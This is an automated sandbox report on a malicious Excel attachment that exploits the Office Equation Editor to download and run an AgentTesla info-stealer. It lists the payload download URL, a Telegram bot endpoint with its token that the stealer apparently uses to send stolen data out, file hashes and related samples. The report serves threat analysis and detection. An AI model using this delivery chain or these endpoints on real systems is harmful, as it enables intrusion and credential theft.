                  Initial Sample

                  SourceDetectionScannerLabelLink
                  New Order for April#89032.xlsx31%ReversingLabsDocument-Office.Exploit.MathType

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\vbc.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe17%ReversingLabsWin32.Trojan.AgentTesla
                  C:\Users\Public\vbc.exe17%ReversingLabsWin32.Trojan.AgentTesla

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  5.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://api.telegram.orgP0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://WrqCET.com0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  https://YiNu10TJVGgbJcx5.com0%Avira URL Cloudsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  http://198.23.174.104/hkn.exe100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://198.23.174.104/hkn.exetrue
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.orgvbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpfalse
                      high
                      http://crl.entrust.net/server1.crl0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ocsp.entrust.net03vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://certificates.godaddy.com/repository/0vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                          high
                          https://dist.nuget.org/win-x86-commandline/latest/nuget.exevbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.drfalse
                            high
                            https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpfalse
                              high
                              https://github.com/d-haxton/HaxtonBot/archive/master.zipvbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.drfalse
                                high
                                http://certs.godaddy.com/repository/1301vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                  high
                                  https://api.telegram.orgPvbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.godaddy.com/gdig2s1-1823.crl0vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                    high
                                    https://certs.godaddy.com/repository/0vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                      high
                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpfalse
                                        high
                                        http://crl.godaddy.com/gdroot-g2.crl0Fvbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                          high
                                          https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmpfalse
                                            high
                                            http://WrqCET.comvbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmpfalse
                                              high
                                              http://crl.godaddy.com/gdroot.crl0Fvbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.%s.comPAvbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zipvbc.exe, vbc.exe.2.drfalse
                                                  high
                                                  https://YiNu10TJVGgbJcx5.comvbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://api.telegram.orgvbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://certificates.godaddy.com/repository/gdig2.crt0vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://ocsp.entrust.net0Dvbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://secure.comodo.com/CPS0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentvbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmpfalse
                                                            high
                                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.entrust.net/2048ca.crl0vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpfalse
                                                              high

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              api.telegram.orgUnited Kingdom
                                                              62041TELEGRAMRUfalse
                                                              198.23.174.104
                                                              unknownUnited States
                                                              36352AS-COLOCROSSINGUStrue

                                                              General Information

                                                              Joe Sandbox Version:31.0.0 Emerald
                                                              Analysis ID:383941
                                                              Start date:08.04.2021
                                                              Start time:12:49:04
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 9m 6s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:New Order for April#89032.xlsx
                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                              Number of analysed new started processes analysed:6
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 2.2% (good quality ratio 1.4%)
                                                              • Quality average: 40.5%
                                                              • Quality standard deviation: 31.2%
                                                              HCA Information:
                                                              • Successful, ratio: 94%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .xlsx
                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                              • Attach to Office via COM
                                                              • Scroll down
                                                              • Close Viewer
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                                              • TCP Packets have been reduced to 100
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              12:50:13API Interceptor54x Sleep call for process: EQNEDT32.EXE modified
                                                              12:50:15API Interceptor793x Sleep call for process: vbc.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              149.154.167.220ORDER.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Scr.Malcodegdn30.6111.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.PackedNET.624.13772.exeGet hashmaliciousBrowse
                                                                    MUYR09080.exeGet hashmaliciousBrowse
                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                        Bellinger ordre.exeGet hashmaliciousBrowse
                                                                          QUATATION.exeGet hashmaliciousBrowse
                                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                                              PO#.exeGet hashmaliciousBrowse
                                                                                OUR PO NO. CWI19150.exeGet hashmaliciousBrowse
                                                                                  ORDER.exeGet hashmaliciousBrowse
                                                                                    QUATATION.exeGet hashmaliciousBrowse
                                                                                      28B2i9LyU8.exeGet hashmaliciousBrowse
                                                                                        (PO #MT098233).exeGet hashmaliciousBrowse
                                                                                          Pg788amGxu.exeGet hashmaliciousBrowse
                                                                                            8oZswc8UuT.exeGet hashmaliciousBrowse
                                                                                              Khay11iwV6.exeGet hashmaliciousBrowse
                                                                                                vcoWaFYhyC.exeGet hashmaliciousBrowse
                                                                                                  Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                    QUATATION.exeGet hashmaliciousBrowse
                                                                                                      198.23.174.104Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/uxx/kuk.exe
                                                                                                      uIIHdM0MHt.rtfGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/om.exe
                                                                                                      SWIFT_ADVISED 1802.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/bbbb/vmv.exe
                                                                                                      Purchase Order No 4462758.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/eemm/xax.exe
                                                                                                      Medical Equipment supply Tender.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/nonon/oko.exe
                                                                                                      SWIFT_ADVISED 1802.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/jmmj/ddd.exe
                                                                                                      NewOrder-PO#08337.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/benn/mym.exe
                                                                                                      New Order-PO08337.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/benn/mym.exe
                                                                                                      Order08388393.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/away/mmn.exe
                                                                                                      20210314$000469.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/laaal/lll.exe
                                                                                                      Drugs.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/wmmw/ooo.exe
                                                                                                      P O 65483939.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/avav/hrh.exe
                                                                                                      copia de pago_9485.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/ike/cox.exe
                                                                                                      Purchase Order Local_00000000089444.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/level/eve.exe
                                                                                                      P O 65483939.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104/mori/ini.exe

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      api.telegram.orgORDER.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Scr.Malcodegdn30.6111.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Trojan.PackedNET.624.13772.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      MUYR09080.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Bellinger ordre.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUATATION.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PO#.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      OUR PO NO. CWI19150.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      ORDER.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUATATION.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      28B2i9LyU8.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      (PO #MT098233).exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Pg788amGxu.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      8oZswc8UuT.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Khay11iwV6.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      vcoWaFYhyC.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUATATION.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      TELEGRAMRUORDER.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Scr.Malcodegdn30.6111.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Trojan.PackedNET.624.13772.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      MUYR09080.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Bellinger ordre.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUATATION.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PO#.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      OUR PO NO. CWI19150.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      ORDER.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUATATION.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      28B2i9LyU8.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      rgdwRVPLVm.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.80
                                                                                                      (PO #MT098233).exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Pg788amGxu.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      8oZswc8UuT.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Khay11iwV6.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      vcoWaFYhyC.exeGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      AS-COLOCROSSINGUSPO PR 111500976.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.213.61
                                                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.207.115
                                                                                                      7yTix20XaT.rtfGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      Inquiry.docxGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      order1562.docxGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      order1562.docxGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      lF5VYmf6Tm.exeGet hashmaliciousBrowse
                                                                                                      • 192.3.26.107
                                                                                                      P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.46.132.132
                                                                                                      Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104
                                                                                                      0f0mccRNrP.exeGet hashmaliciousBrowse
                                                                                                      • 192.3.26.107
                                                                                                      R6G6EFOeOE.rtfGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      NEW ORDER PO.xlsxGet hashmaliciousBrowse
                                                                                                      • 198.23.213.57
                                                                                                      uIIHdM0MHt.rtfGet hashmaliciousBrowse
                                                                                                      • 198.23.174.104
                                                                                                      New purchase Order_Invoice payment info and shipping documents.docxGet hashmaliciousBrowse
                                                                                                      • 198.23.251.121
                                                                                                      SecuriteInfo.com.Packed-GDKD3066D931944.20107.exeGet hashmaliciousBrowse
                                                                                                      • 192.3.26.107
                                                                                                      SecuriteInfo.com.W32.AIDetect.malware1.1169.exeGet hashmaliciousBrowse
                                                                                                      • 192.3.26.107
                                                                                                      4i1GUIgglX.exeGet hashmaliciousBrowse
                                                                                                      • 192.210.198.12
                                                                                                      ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                      • 107.173.219.80
                                                                                                      ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                      • 107.173.219.80
                                                                                                      vm583573758.htmGet hashmaliciousBrowse
                                                                                                      • 192.210.170.109

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      36f7277af969a6947a61ae0b815907a1PAGO.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      invoice.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PR_A1191-04052021.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      HL-57269806 TRMER.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Updated SOA.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Statement of Account.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      FARASIS.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Topresh_Sub2.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2221.rtfGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      MKDRPSJS9E999494993.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      _ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                                                                      • 149.154.167.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe
                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):881152
                                                                                                      Entropy (8bit):7.199964525474944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
                                                                                                      MD5:5F968F612F82F74C96DD257793CF917D
                                                                                                      SHA1:004213F3E85514317B8A711EDC42A124BE378ADF
                                                                                                      SHA-256:2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
                                                                                                      SHA-512:BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                      Reputation:low
                                                                                                      IE Cache URL:http://198.23.174.104/hkn.exe
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.n`..............P..*...F......fI... ...`....@.. ....................................@..................................I..O....`..,B........................................................................... ............... ..H............text...l)... ...*.................. ..`.rsrc...,B...`...D...,..............@..@.reloc...............p..............@..B................HI......H........?...H..........L................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....ol...('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BCDEC9D.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14198
                                                                                                      Entropy (8bit):7.916688725116637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
